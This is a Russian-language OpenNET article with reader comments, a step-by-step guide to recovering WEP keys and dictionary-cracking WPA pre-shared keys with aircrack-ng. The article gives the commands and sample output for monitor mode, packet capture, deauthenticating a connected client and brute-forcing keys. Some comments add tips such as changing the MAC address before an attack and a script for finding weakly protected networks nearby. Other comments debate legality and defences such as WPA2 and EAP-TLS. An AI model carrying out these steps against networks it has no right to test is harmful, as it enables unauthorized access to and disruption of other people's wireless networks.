The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Перехват WEP и WPA ключей в беспроводной сети при помощи AIR Crack
Инструкция по подбору ключей шифрования в беспроводных сетях, базирующихся на
механизме WEP, являющемся устаревшим, но продолжающем широко использоваться.
Данная информация предназначена только для ознакомления и может быть
использована исключительно в целях проверки надежности собственной сетевой инфраструктуры.

Устанавливаем пакет AIR Crack.
В Debian/Ubuntu:

   $ sudo apt-get install aircrack-ng

В Fedora/CentOS/RHEL:

   $ sudo yum -y install aircrack-ng

Определяем сетевой интерфейс, привязанный к беспроводной карте:
2. Identify wireless network interface

   $ /sbin/iwconfig

   wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

Активируем режим мониторинга:

   $ sudo airmon-ng start wlan0

   Interface       Chipset         Driver
   wlan0                   rtl8180 - [phy0]
   (monitor mode enabled on mon0)

Определяем BSSID-идентификатор сети:

   $ sudo airodump-ng wlan0

   BASE:
   BSSID : 00:0F:B5:FD:FB:C2
   Channel: 6
   STATION:
   MAC: 00:13:04:30:FA:EC

Для успешного проведения атаки к точке доступа должна быть подключена хотя бы
одна активная машина, чем больше трафик у которой, тем быстрее будет подобран ключ.

Включаем режим снифинга и накапливаем статистику. Чем длиннее WEP-ключ тем
больше пакетов необходимо перехватить (64-битный ключ требует накопления
примерно 6000 пакетов):

   $ sudo airodump-ng -c 6 --bssid 00:0F:B5:FD:FB:C2 -w data-capture wlan0

где, "-c 6" - номер канала беспроводной точки доступа (см. вывод airodump-ng
wlan0). В опции --bssid указан идентификатор точки доступа, для отсеивания
лишнего трафика. Все перехваченные пакеты будут сохранены в файле data-capture-01.cap.

После накопления достаточного объема статистики подбираем WEP-ключ (выполняем
операцию не прерывая процесс снифинга, так как числа перехваченных пакетов
может не хватить):

   $ sudo aircrack-ng -z data-capture-01.cap

   Opening data-capture-01.cap
   Read 450 packets.

   #  BSSID              ESSID                     Encryption
   1  00:11:95:35:FD:12  test1                WEP (210 IVs)
   2  00:17:3F:62:2E:50  test2                None (0.0.0.0)

    Index number of target network ? 1

   [00:00:21] Tested 485 keys (got 17690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20993) 06(20737) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28417) A8(23298) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25857) BC(23809) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24321) 35(2259) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21505) 7C(20993) 84(20992) E0(20992) F0(20992)

   KEY FOUND! [ 1F:F3:6E:6A:98 ]
   Decrypted correctly: 100%

На выходе получили искомый ключ "1F:F3:6E:6A:98".


Подбор простого словарного pre-shared WPA-ключа.

Похожим образом осуществляется подбор WPA-ключа, только для успешного
завершения подбора требуется значительно больше времени и определенное везение.

После запуска  airodump-ng дожидаемся соединения клиента к сети:

   CH  6 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
   ...
    BSSID              STATION            PWR  Lost  Packets  Probes                                             
    00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

После чего инициируем деаутентификацию клиента:

   $ sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

   11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

где, 1 - число отправленных deauth-пакетов, 00:14:6C:7E:40:80 - MAC точки
доступа, 00:0F:B5:FD:FB:C2  - MAC клиента.

Запускаем процесс подбора ключевой фразы по словарю password.lst.

   $ aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 data-capture-01.cap

В случае успеха получаем примерно следующее:
 
   BSSID              ESSID                     Encryption
    1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
   
   Choosing first network as target.
   ...
   [00:00:00] 2 keys tested (37.20 k/s)
   KEY FOUND! [ 12345678 ]
 
   Master Key     : CD 69 ...
   Transcient Key : 06 F8 ... 
   EAPOL HMAC     : 4E 27 ...
 
Ключи: wep, wifi, security, aircrack / Лицензия: CC-BY
Раздел:    Корень / Безопасность / Шифрование, PGP

Обсуждение [ Линейный режим | Показать все | RSS ]
  • 1.1, pavel_simple (ok), 13:28, 11/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ребята я конечно всё понимаю -- но подобные мануалы, в который в самом начале не сказано что "данная информация предназначена _только_ для ознакомления и может быть использованна _исключительно_ в целях проверки собственной сетевой инфраструктуры" могут быть истолкованы в рамках вполне конкретной статьи УК РФ. !!!WARNING!!!
     
  • 1.2, mega4el (ok), 14:53, 11/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Может кто подскажет как попроще сделать загрузочную флешку с подобными инструментами на борту?
     
     
  • 2.3, aaa (??), 17:56, 11/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    http://www.aircrack-ng.org/doku.php?id=slitaz
     

  • 1.5, аноним (?), 23:17, 11/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Мануалы по взлому вай-файя плодятся уже 10 лет подряд. Вековой баян. Называется, "для тех, кто без гугла" или "самым одаренным от самых одаренных ".
     
  • 1.6, QuAzI (ok), 09:48, 12/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А методы защиты слабо написать?
     
     
  • 2.7, анонимус (??), 12:30, 12/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    использовать WPA2
     
     
  • 3.11, daevy (ok), 10:20, 13/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    не панацея.
    нужны radius, kerberos.
     
     
  • 4.14, _Bulgarin (ok), 21:23, 13/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    угу, и сисадмина застрелить сразу...
     
     
  • 5.28, kde (??), 17:33, 24/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    нафига??? EAP-TLS с привязкой к мак адресу.
    и нач. отдела кадров на выдачу ключей :-D
    их стреляй скокавлезет
     
  • 2.15, pavlinux (ok), 23:58, 13/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    WPA2
    PSK = "4My$uPpErP@$$\/\/0rD|"
     

  • 1.8, xa2rd (?), 14:06, 12/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Странно видеть подобную статью на опеннете. Про этот метод только очень ленивые не писали.
     
  • 1.9, Deam (ok), 16:51, 12/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Прочитал заголовок, думал, что что-то новое. А оказалось всё старое. N900 WEP как орешки раскалывает.
     
  • 1.12, netc (ok), 12:08, 13/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    я конечно дико извиняюсь, но ИМХО статьи на opennet - не хватало, по причине того что на opennet - очень приятно читать и скать любую информацию, да не смотря на то что есть google - opennet - это не только статья как таковая а еще и полезные комментарии.
     
     
  • 2.13, Meddina (ok), 14:18, 13/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Поддерживаю! порой комментарии бывают содержательней, чем сама статья!
     

  • 1.16, Харон (?), 13:23, 14/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ИМХО, немешает добавить пункт со сменой МАК-адреса атакующей карточки перед началом атаки ;)
     
     
  • 2.18, Nas_tradamus (ok), 18:16, 16/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Cкажите, в статье есть строки:

    "Определяем BSSID-идентификатор сети:
       $ sudo airodump-ng wlan0"

    Как автор узнал, что в сети "00:0F:B5:FD:FB:C2", которую он нашел, используется WEP?

    Вопрос: как быстро найти WEP-сети без использования kismet каким-нибудь скриптом?
    Дело в том, что на N900 дико неудобно юзать Kismet из консоли.

     
     
  • 3.19, artickl (?), 18:57, 17/09/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    я использую простой скрипт

    iwlist wlan0 scanning | grep -e ESSID -e Encryption -e WPA -e Channel -e Address | grep -v Frequency | sed 's/Address:/net/' | sed 's/Cell [0-9]* -//' | sed 's/^.*Channel://' | sed 's/^.*Encryption key:/enc-/' | sed 's/^.*ESSID://' | sed 's/^.*IE: //' | tr '\n' '|' | sed 's/           /\t/g' | tr '\t' '\n' | grep -v WPA

    который выдает все открытые сетки вокруг + WEP сетки. Для меня очень удобно - не всегда есть возможность графику включить - например на wrt54 )))

     
     
  • 4.20, artickl (?), 19:00, 17/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    ну или просто

    wlist wlan0 scan

    и ручками просмотреть где стоит "Encryption on" но после этого ничего про WPA или WPA2 не сказано - значит WEP


     
     
  • 5.21, Nas_tradamus (ok), 20:42, 17/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >ну или просто
    >
    >wlist wlan0 scan
    >
    >и ручками просмотреть где стоит "Encryption on" но после этого ничего про
    >WPA или WPA2 не сказано - значит WEP

    Спасибо! Не знал про wlist.

    Надо бы написать для Maemo скриптец для взлома сети одним кликом. )

     

  • 1.22, Вася Пупкин (?), 00:27, 18/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    капец, ломатели, неужели кто-то еще юзает WPA и WEP.
    Либо просто открытая сетка, либо WPA2 и все эти древние мануалы идут лесом.
     
     
  • 2.29, zazik (ok), 10:50, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Используют. Некоторые мобильные устройства WPA2 не понимают, только WPA.
     

  • 1.23, linux_must_die (ok), 04:43, 18/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    да запросто: dir-300 по дефолту стоит WPA/WEP или вообще без шифрования. и так почти везде
     
  • 1.24, Аноним (-), 11:57, 19/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Да и брутфорс по словарю актуален действительно только при пароле вроде "12345678"... Но кто такой установит :)
     
     
  • 2.25, Nas_tradamus (ok), 14:35, 19/09/2010 [^] [^^] [^^^] [ответить]  
  • +/
    В статье не сказано, что нужно ловить "#Data" пакеты, а не простые. Во вторых, не сказано как нагонять эти пакеты (рукопожатие и т. д.) обеими способами.

    Я долго не мог понять почему у меня aircrack-ng пишет "Got no data packets from target network!". Эта статья сбила меня. :)

    В общем, ловить data-пакеты WEP можно очень долго и нудно. Я вот за час не поймал ни одного пакета, хотя вокруг меня 4 WEP-точки.

    Может дело в N900... не знаю.

     
  • 2.31, Аноним (-), 18:53, 25/10/2013 [^] [^^] [^^^] [ответить]  
  • +/
    я установил =)
     

  • 1.27, Аноним (-), 16:16, 21/09/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    странно, но aurodump-ng выдаёт сверху следующее: [fixed channel mode -1] как то так. что бы это могла значить?
     
  • 1.30, leo (??), 21:31, 20/12/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    новичок
     


     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:




    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру